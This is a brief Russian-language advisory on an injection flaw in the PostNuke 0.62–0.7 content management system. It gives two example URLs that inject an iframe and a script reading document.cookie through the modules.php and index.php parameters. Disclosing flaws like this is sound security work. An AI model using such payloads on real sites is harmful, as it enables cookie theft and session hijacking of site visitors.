PostNuke - система управления сайтом
написанная на php и доступная для Windows и Linux.
Уязвимость позволяет выполнить произвольный
код при помощи сценариев modules.php и index.php.
Пример:
http://one_of_100's_of_sites/modules.php? op=modload&name=<iframe%20src="http://www.microsoft.com">
http://one_of_100's_of_sites/index.php? catid=<script>alert (document.cookie)</script>
Уязвимость найдена в PostNuke Development Team PostNuke 0.62-0.7.
